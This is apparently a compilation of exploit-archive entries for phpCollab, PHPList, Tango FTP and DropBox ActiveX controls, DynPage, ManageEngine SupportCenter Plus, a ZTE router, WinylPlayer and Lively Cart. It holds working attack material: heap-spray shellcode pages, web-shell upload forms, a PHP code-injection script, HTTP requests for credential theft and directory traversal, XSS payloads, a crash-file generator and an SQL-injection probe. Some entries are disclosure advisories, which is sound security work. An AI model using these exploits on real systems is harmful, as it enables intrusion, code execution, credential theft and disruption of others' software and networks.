HireHackking

source: https://www.securityfocus.com/bid/53675/info phpCollab is prone to an unauthorized-access and an arbitrary-file-upload vulnerabilities. Attackers can leverage these issues to gain unauthorized access to application data and to upload and execute arbitrary code in the context of the application. phpCollab 2.5 is vulnerable; other versions may also be affected. POST /phpcollab/projects_site/uploadfile.php?PHPSESSID=f2bb0a2008d0791d1ac45a8a3 8e51ed2&action=add&project=&task= HTTP/1.1 Host: 192.0.0.2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 DNT: 1 Proxy-Connection: keep-alive Cookie: PHPSESSID=6cvltmkam146ncp3hfbucumfk6 Referer: http://192.0.0.2/ Content-Type: multipart/form-data; boundary=---------------------------19548990971636807826563613512 Content-Length: 29914 -----------------------------19548990971636807826563613512 Content-Disposition: form-data; name="MAX_FILE_SIZE" 100000000 -----------------------------19548990971636807826563613512 Content-Disposition: form-data; name="maxCustom" -----------------------------19548990971636807826563613512 Content-Disposition: form-data; name="commentsField" Hello there -----------------------------19548990971636807826563613512 Content-Disposition: form-data; name="upload"; filename="filename.jpg" Content-Type: image/jpeg file data stripped -----------------------------19548990971636807826563613512 Content-Disposition: form-data; name="submit" Save -----------------------------19548990971636807826563613512--

source: https://www.securityfocus.com/bid/53693/info PHPList is prone to a remote PHP code-injection vulnerability. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. PHPList 2.10.9 is vulnerable; other versions may also be affected. # --------------------------------------- # # This PoC was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # --------------------------------------- # # 1) Bug # 2) PoC # --------------------------------------- # # 2) Bug : # An attacker might execute arbitrary PHP code with this vulnerability. # User tainted data is embedded into a function that compiles # PHP code on the run and #executes it thus allowing an attacker to inject own PHP code that will be # executed. This vulnerability can lead to full server compromise. # Look To The File Named (Sajax.php) In Dir (admin/commonlib/lib) On Line (63) # 63. $func_name = $_POST["rs"]; # if (! empty($_POST["rsargs"])) # $args = $_POST["rsargs"]; # else # $args = array(); # } # # if (! in_array($func_name, $sajax_export_list)) # echo "-:$func_name not callable"; # else { # echo "+:"; # 74. $result = call_user_func_array($func_name, $args); # echo $result; # } # exit; # } # So We Have Variable Func Name With Post rs :) # In Above Of Code We Have $_GET['rs']; So This Is An Attacker Wan't It. # Look To Line (74). # Call_User_Func_Array($func_name, $args); # Attacker Can Inject In Get Paramater Or POST PHP Code. # --------------------------------------- # # 3) PoC : # <?php # $target = $argv[1]; # $ch = curl_init(); # curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); # curl_setopt($ch, CURLOPT_URL, "http://$target/Sajax.php"); # curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); # curl_setopt($ch, CURLOPT_POST, 1); # curl_setopt($ch, CURLOPT_POSTFIELDS, "rs=whoami"); # curl_setopt($ch, CURLOPT_TIMEOUT, 3); # curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); # curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); # curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); # $buf = curl_exec ($ch); # curl_close($ch); # unset($ch); # echo $buf; # ?>

<HTML> <BODY> <input language=JavaScript onclick=Tryme() type=button value="Launch Calc"> <object id=boom classid="clsid:{25982EAA-87CC-4747-BE09-9913CF7DD2F1}"></object> <br>Tango FTP Activex Heap Spray Exploit</br> <br>Version:1.0(Build 136)</br> <br>The vulnerability lies in the COM component used eSellerateControl350.dll (3.6.5.0) method of the ''GetWebStoreURL' member.</br> <br>Vendor Homepage:http://www.tangoftp.com/index.html</br> <br>Software Link:http://www.tangoftp.com/downloads/index.html</br> <br>Author: metacom</br> <!--Video Poc:http://bit.ly/1fjtq89 --> <SCRIPT> var heapspray=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); var sprayContainer = unescape("%u9090%u9090"); var heapToAddress = 0x0a0a0a0a; function Tryme() { var size_buff = 5000; var x = unescape("%0a%0a%0a%0a"); while (x.length<size_buff) x += x; x = x.substring(0,size_buff); boom.GetWebStoreURL(x, 1); } function getsprayContainer(sprayContainer, sprayContainerSize) { while (sprayContainer.length*2<sprayContainerSize) { sprayContainer += sprayContainer; } sprayContainer = sprayContainer.substring(0,sprayContainerSize/2); return (sprayContainer); } var heapBlockSize = 0x500000; var SizeOfHeap = 0x30; var payLoadSize = (heapspray.length * 2); var sprayContainerSize = heapBlockSize - (payLoadSize + SizeOfHeap); var heapBlocks = (heapToAddress+heapBlockSize)/heapBlockSize; var memory = new Array(); sprayContainer = getsprayContainer(sprayContainer,sprayContainerSize); for (i=0;i<heapBlocks;i++) { memory[i] = sprayContainer + heapspray; } </SCRIPT> </BODY> </HTML>

<HTML> <BODY> <input language=JavaScript onclick=Tryme() type=button value="Launch Calc"> <object id=boom classid="clsid:{C915F573-4C11-4968-9080-29E611FDBE9F}"></object> <br>Tango DropBox Activex Heap Spray Exploit</br> <br>Version:3.1.5 + PRO</br> <br>The vulnerability lies in the COM component used eSellerateControl350.dll (3.6.5.0) method of the ''GetWebStoreURL' member.</br> <br>Vendor Homepage:http://etonica.com/dropbox/index.html</br> <br>Software Link:http://etonica.com/dropbox/download.html</br> <br>Author: metacom</br> <!--Video Poc:http://bit.ly/1K0hnYS --> <SCRIPT> var heapspray=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); var sprayContainer = unescape("%u9090%u9090"); var heapToAddress = 0x0a0a0a0a; function Tryme() { var size_buff = 5000; var x = unescape("%0a%0a%0a%0a"); while (x.length<size_buff) x += x; x = x.substring(0,size_buff); boom.GetWebStoreURL(x, 1); } function getsprayContainer(sprayContainer, sprayContainerSize) { while (sprayContainer.length*2<sprayContainerSize) { sprayContainer += sprayContainer; } sprayContainer = sprayContainer.substring(0,sprayContainerSize/2); return (sprayContainer); } var heapBlockSize = 0x500000; var SizeOfHeap = 0x30; var payLoadSize = (heapspray.length * 2); var sprayContainerSize = heapBlockSize - (payLoadSize + SizeOfHeap); var heapBlocks = (heapToAddress+heapBlockSize)/heapBlockSize; var memory = new Array(); sprayContainer = getsprayContainer(sprayContainer,sprayContainerSize); for (i=0;i<heapBlocks;i++) { memory[i] = sprayContainer + heapspray; } </SCRIPT> </BODY> </HTML>

source: https://www.securityfocus.com/bid/53696/info DynPage is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. DynPage 1.0 is vulnerable; other versions may also be affected. ########>>>>> Explo!T <<<<<<################## # Download : [http://www.dynpage.net/download/dynpage.zip] ### [ Upload Sh3LL.php;.txt ] => <form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Files" method="post" enctype="multipart/form-data" > <input name="Files" type="file" class="submit" size="80"> <input type="submit" value="Upload !"> </form> ### [ Upload Sh3LL.php;.gif ;.jpeg ] => <!-- p0c 1 --> <form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Images" method="post" enctype="multipart/form-data" > <input name="Images" type="file" class="submit" size="80"> <input type="submit" value="Upload !"> </form> <!-- p0c 2 --> <form action="http://www.example.com/[path]/js/ckfinder/ckfinder.html?Type=Images" method="post" enctype="multipart/form-data" > <input name="Images" type="file" class="submit" size="80"> <input type="submit" value="Upload !"> </form> ### [ Upload Sh3LL.php;.swf ;.flv ] => <!-- p0c 1 --> <form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Flash" method="post" enctype="multipart/form-data" > <input name="Images" type="file" class="submit" size="80"> <input type="submit" value="Upload !"> </form> <!-- p0c 2 --> <form action="http://www.example.com/[path]/js/ckfinder/ckfinder.html?Type=Flash" method="post" enctype="multipart/form-data" > <input name="Images" type="file" class="submit" size="80"> <input type="submit" value="Upload !"> </form> ############# << ThE|End

Document Title: =============== ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1501 Release Date: ============= 2015-06-19 Vulnerability Laboratory ID (VL-ID): ==================================== 1501 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== SupportCenter Plus is a web-based customer support software that lets organizations effectively manage customer tickets, their account and contact information, the service contracts and in the process providing a superior customer experience. SupportCenter Plus is commonly deployed on internet accessible interfaces to allow customers to access the application. This common deployment scenario often involves a combination of low privilege accounts for customers (typically local authentication) and higher privilege accounts for help desk stuff (typically Active Directory integrated). Note that it is not unusual to allow any internet user to be able to register a low privilege account. This deployment scenario is important to consider when evaluating the risk of the below vulnerabilities. (Copy of the Vendor Homepage: https://www.manageengine.com/products/support-center/ ) Abstract Advisory Information: ============================== An indepndent vulnerability researcher discovered multiple vulnerabilities in the official ManageEngine SupportCenter Plus v7.90 web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-27: Researcher Notification & Coordination (Alain Homewood) 2015-06-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Manage Engine Product: SupportCenter Plus - Web Application 7.90 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ 1.1 Improper authentication disclosing password (Authenticated) Missing user access control mechanisms allow low privilege users to gain unauthorised access to sensitive Active Directory integration functionality normally only accessibly by Administrators. This functionality allows a low privilege user to: 1.) Retrieve the plain text user name and password for the domain account (typically Domain Administrator or similar) used to integrate with Active Directory 2.) Configure arbitrary domains to be used for authentication and import users from these domains (overwriting existing user records) A low privilege user in SupportCenter Plus can gain privileged access to both the application and any integrated domains. Typical attack scenarios could include: 1.) SupportCenter Plus is accessible via the internet. An internet based attacker who can gain access to a low privilege account (registering an account if enabled or stealing an account) can gain access to highly privileged domain credentials. The attacker can then use these credentials to gain remote access to the organisation through other means (e.g. VPNs or physically in a meeting room at the organisation). 2.) SupportCenter Plus is not accessible via the internet. An attacker who has gained a low level of compromise in an organisation (i.e. any user who can access SupportCenter Plus) can use these vulnerabilities to escalate themselves to domain administrator or similar. Pre-requisites and considerations include: - In order to steal existing domain credentials it is necessary for Active Directory integration to have been setup. - In order to import users from an attacker controlled domain it is necessary for the SupportCenter Plus server to have network connectivity to the attacker server (i.e. firewall rules may prevent this) - It is possible to login to SupportCenter Plus using domain authentication even when this option is hidden (typically done so that the domain name isn`t displayed on the internet accessible login) 1.2 Directory traversal on file upload (Authenticated) Low privilege users have the ability to attach files to work order requests (e.g. to attach a screenshot). This functionality is vulnerable to directory traversal and allows low privilege users to upload files to arbitrary directories. Potential impacts of this vulnerability include: 1.) Remote code execution *** 2.) Denial of service 3.) Uploading malicious static content to web accessible directories (e.g. JavaScript, malware etc) *** There are two key limitations to this vulnerability that limit any easily exploitable method for code execution through exploiting the underlying JBoss environment: 1.) A Java compiler is not installed as part of SupportCenter Plus which prevents uploaded JSP files from being executed 2.) The uploaded directory always appends an additional directory (named after the user`s ID) which prevents deployment of a packaged or unpackaged WAR file (or similar) Despite the above limitations I cannot con conclusively determine that code execution is not possible. 1.3 Reflected cross site scripting (Authenticated) Multiple authenticated reflected cross site scripting vulnerabilities exist in SupportCenter Plus. Unsanitised user provided input in the `query` parameter is echoed back to the user during requests to /CustomReportHandler.do. Only administrators (or similar highly privileged) users with access to the custom report functionality are vulnerable to this attack vector. Unsanitised user provided input in the `compAcct` parameter is echoed back to user during requests to /jsp/ResetADPwd.jsp. Unsanitised user provided input in the `redirectTo` parameter is echoed back to user during requests to /jsp/CacheScreenWidth.jsp. All authenticated users are vulnerable to these attack vectors. Proof of Concept (PoC): ======================= 1.1 The vulnerability can be exploited by remote attackers without user interaction. For security demonstration or to reproduce follow the provided information and steps below. Manual steps to reproduce the vulnerability ... 1.) Set up a Active Directory domain 2.) Install SupportCenter Plus 3.) Login as an administrator and add a Windows domain and associated credentials 4.) Logout and login as a low privilege user (by default there is guest/guest account) 5.) Attempt to access the above URLs and observe that you can access the functionality with no restrictions (e.g. browse to http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and view the password in the HTML source code) Plain text domain credentials can be viewed in the HTML source code of the following pages when logged in as low privilege user: http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP http://[VULNERABLE]/ImportADUsers.do Additional domains can be added through browsing to http://[VULNERABLE]/ImportADUsers.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and then selecting "Add New Domain" which will allow you to enter the domain details resulting in a POST similar to this: POST /EditDomain.do?SUBREQUEST=XMLHTTP HTTP/1.1 Host: [VULNERABLE] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Referer: http://[VULNERABLE]:9090/AdminHome.do Content-Length: 181 Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; JSESSIONID=C14EA9B74F5D5C7B2F3055EA96F71188; PREV_CONTEXT_PATH=; JSESSIONIDSSO=391CCA5D883203EBE1CD84BEFCB26144 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache name=TESTDOMAIN&isPublicDomain=on&domainController=CONTROLLER&loginName=Administrator&password=Password123&id=1&addButton=&cancel=Cancel&updateButton=Save&cancel=Cancel&description= Domain users can be imported by browsing to http://[VULNERABLE]/ImportADUsers.do selecting the domain and clicking next. You can then select the Operation Units (OUs) you want to import from the domain and click "Start Import" resulting in a POST similar to this: POST /ImportADUsers.do HTTP/1.1 Host: [VULNERABLE] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[VULNERABLE]:9090/ImportADUsers.do Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=; JSESSIONID=96062390B861F5901A937CE3A71A8F4D; JSESSIONIDSSO=C5CBE9C1CB90CEA338318B903BEDE26A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 193 selectedOUs=2&importUser=Start+Import&selectOUs=Next&serverName=CONTROLLER&domainName=TESTDOMAIN&userName=Administrator&userPassword=password123&isRefresh=true&phone=true&mobile=true&job=true&email=true 1.2 The vulnerability can be exploited by remote attackers without user interaction. For security demonstration or to reproduce follow the provided information and steps below. Files are uploaded via a POST request to /workorder/Attachment.jsp?component=Request It is possible to manipulate the "module" parameters to traverse directories. Decompiled source code of the creation of the file path is shown below: String filePath1 = "Attachments" + filSep + module + filSep + userID1 Note that an additional directory (named after the user's ID) is always appended to file path. In the below example POST a module value of ../../../../../../../../../../../../ is specified and the logged in user has an ID value of 2. The resulting file in this case is uploaded to c:\2\payload.html on a Windows environment. An example POST request is shown below: POST /workorder/Attachment.jsp?component=Request HTTP/1.1 Host: [VULNERABLE]:9090 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[VULNERABLE]:9090/workorder/Attachment.jsp?component=Request Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=/custom; JSESSIONID=DCB297647A29281C4E80C76898B4B09A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; domainName=TESTDOMAIN; JSESSIONIDSSO=A1E2CBF658231DF263F84A994E27F536 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------17390486101970088239358532669 Content-Length: 1110 -----------------------------17390486101970088239358532669 Content-Disposition: form-data; name="filePath"; filename="payload.html" Content-Type: application/octet-stream test12345 -----------------------------17390486101970088239358532669 Content-Disposition: form-data; name="filename" payload.html -----------------------------17390486101970088239358532669 Content-Disposition: form-data; name="vecPath" -----------------------------17390486101970088239358532669 Content-Disposition: form-data; name="vec" -----------------------------17390486101970088239358532669 Content-Disposition: form-data; name="theSubmit" AttachFile -----------------------------17390486101970088239358532669 Content-Disposition: form-data; name="formName" null -----------------------------17390486101970088239358532669 Content-Disposition: form-data; name="component" ../../../../../../../../../../../../ -----------------------------17390486101970088239358532669 Content-Disposition: form-data; name="ATTACH" Attach -----------------------------17390486101970088239358532669-- 1.3 The cross site scripting web vulnerability can be exploited by remote attackers with low or medium user interaction. For security demonstration or to reproduce follow the provided information and steps below. Administrator user only: http://[VULNERABLE]:9090/CustomReportHandler.do?module=run_query_editor_query&reportTitle=test&query=<BODY%20ONLOAD=alert(1)> Any authenticated user: http://[VULNERABLE]:9090/jsp/ResetADPwd.jsp?compAcct=%22%3E%3CIFRAME%20SRC=%22http://www.google.com%22%3E%3C/IFRAME%3E http://[VULNERABLE]:9090/jsp/CacheScreenWidth.jsp?width=1600&redirectTo=";alert(1);// Security Risk: ============== 1.1 The security risk of the authentication disclosing password vulnerability is estimated as high. (CVSS 6.9) 1.2 The security risk of the directory traversal web vulnerability is estimated as high. (CVSS 5.9) 1.3 The security risk of the cross site scripting web vulnerabilities are estimated as medium. (CVSS 3.3) Credits & Authors: ================== Alain Homewood (PwC New Zealand) - [http://vulnerability-lab.com/show.php?user=Alain%20Homewood] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Document Title: =============== ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1522 Release Date: ============= 2015-06-16 Vulnerability Laboratory ID (VL-ID): ==================================== 1522 Common Vulnerability Scoring System: ==================================== 6 Product & Service Introduction: =============================== ZTE zxv10 w300 ADSL wireless router cat family gateway (accessories include a host, a power line, a line of 1 root, separator, 1) (Copy of the Vendor Homepage: http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130204_386351.html ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a remote vulnerability in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware. Vulnerability Disclosure Timeline: ================================== 2015-06-16: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ZTE Corporation Product: ZTE ZXV10 W300 3.1.0c_DR0 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A session vulnerability has been discovered in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware. The security vulnerability allows remote attackers to block/shutedown or delete network settings and components. The LAN configuration post to /Forms/home_lan_1 and the page /home_lan_1 that stores the configuration of the router. Attackers can request via GET method the /Forms/home_lan_1 path and the modem will delete all the LAN configurations automatically. The problem is the GET method request with the /Forms/home_lan_1 path that deletes all the configurations. A hard reset is required after successful exploitation of the issue. The security risk of the router ui web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.0. Exploitation of the security web vulnerability requires no privilege web-application user account and low user interaction (click link). Successful exploitation of the vulnerability results in reset of the modem device, shutdown of the network/lan or compromise of running services. Request Method(s): [+] POST Vulnerable Module(s): [+] Forms/ Affected Module(s): [+] home_lan_1 Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privilege application user account and low user interaction (click). For security demonstration or to reproduce follow the provided information and steps below to continue. --- PoC Session Logs [GET] --- 13:18:35.526[0ms][total 0ms] Status: pending[] GET http://192.168.1.1/Forms/home_lan_1 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[unknown] Mime Type[unknown] Request Headers: Host[192.168.1.1] User-Agent[Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] X-Forwarded-For[8.8.8.8] Connection[keep-alive] Authorization[Basic YWRtaW46YWRtaW4=] Note: The victim with needs to click to perform only the GET method request with non expired session to execute! Reference(s): http://localhost/Forms/home_lan_1 Security Risk: ============== The security risk of the remote vulnerability in the interface service is estimated as high. (CVSS 6.0) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

#!/usr/bin/python #[+] Author: Rajganesh (Raj) Pandurangan #[+] Exploit Title: WinylPlayer 3.0.3 Memory Corruption PoC #[+] Date: 06-17-2015 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 #[+] Vendor: http://vinylsoft.com/ #[+] Download: http://vinylsoft.com/download/winyl_setup.zip #[+] Sites: www.exclarus.com #[+] Twitter: @rajganeshp #[+] Thanks: offensive security (@offsectraining) print"###########################################################" print"# Title: WinylPlayer 3.0.3 Memory Corruption PoC #" print"# Author: Rajganesh Pandurangan #" print"# Category: DoS/PoC # " print"###########################################################" header = ("\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20" "\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00" "\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00" "\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00" "\x5a\x00\x2f\x00\x67\x00\x0a") exploit = header exploit += "\x41" * 900000 crash = open('crash.wav','w') crash.write(exploit) crash.close()

################################################################################################## #Exploit Title : Lively cart SQL Injection vulnerability #Author : Manish Kishan Tanwar AKA error1046 #Vendor Link : http://codecanyon.net/item/livelycart-a-jquery-php-store-shop/5531393 #Date : 18/06/2015 #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi #Discovered At : Indishell Lab ################################################################################################## //////////////////////// /// Overview: //////////////////////// Lively cart is shping cart script and search parameter(search_query) in not filtering user supplied data and hence affected from SQL injection vulnerability /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to search_query GET parameter //////////////// /// POC //// /////////////// http://SERVER/1.2.0/product/search?search_query=' --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, 